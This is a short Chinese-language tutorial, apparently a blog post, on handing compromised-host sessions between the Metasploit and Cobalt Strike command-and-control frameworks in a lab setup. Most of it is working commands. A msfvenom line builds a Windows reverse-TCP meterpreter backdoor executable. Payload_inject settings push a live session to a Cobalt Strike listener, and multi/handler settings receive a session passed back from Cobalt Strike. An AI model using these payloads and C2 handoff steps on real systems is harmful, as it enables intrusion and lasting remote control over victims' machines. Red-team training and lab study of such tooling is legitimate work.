作为C2工具,MSF和CS各有千秋,CS有着多种强大的自定义插件和易操作的图形化界面,而MSF集成了针对各类系统的Payload攻击代码,为了针对性的进行攻击,我们有时候会需要将MSF的会话转发到CS,或者相反
演示环境如下,MSF和CS部署在同一台主机上:
- MSF:192.168.30.15
- CS:192.168.30.15
- 靶机:192.168.30.129
MSF转发CS
如果没有事先准备,可以用下面的执行生成一个后门文件上线
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.30.15 LPORT=8888 -f exe > shell.exe
上线后通过下面的指令将会话挂在到后台,方便我们回到MSF控制台进行会话转发操作
background
查看会话,确保有一个上线机器能让我们进行会话转发
然后在CS新增一个监听,其实不用特意新建,用原有做后门监听的监听器就可以
回到MSF,通过下面指令进行会话派送,其中主机地址和端口要设置的与上面我们创建的CS监听器一致
use exploit/windows/local/payload_inject
# payload类型与监听器监听的类型一致
set payload windows/meterpreter/reverse_http
# 设置CS主机地址和CS监听端口
set LHOST 192.168.30.15
set LPORT 38080
# 设置需要委派的会话编号
set session 3
# 禁止生成一个新的监听器用来服务payload连接
set DisablePayloadHandler true
exploit
运行后在CS可以看到MSF派送过来的会话,并且MSF原有会话不会丢失
CS转发MSF
一样,在上线前首先确保我们已有至少一个会话,我们就用上面获取的
新建一个监听器,用于转发会话到MSF,填入MSF的监听地址和端口,Payload选择Foreign类型
在MSF时输入下面的指令
msfconsole
use exploit/multi/handler
# payload类型与CS监听器一致
set payload windows/meterpreter/reverse_http
# 设置MSF本地监听地址
set LHOST 0.0.0.0
# 设置MSF自身监听的端口
set LPORT 4444
exploit
回到CS,右键会话点击新建会话(spawn),选择我们刚创建的MSF转发监听器,将会话转发到MSF
在MSF中可以看到收到CS的会话派送,可以在MSF中进行后渗透操作,并且CS中的原有会话不会丢失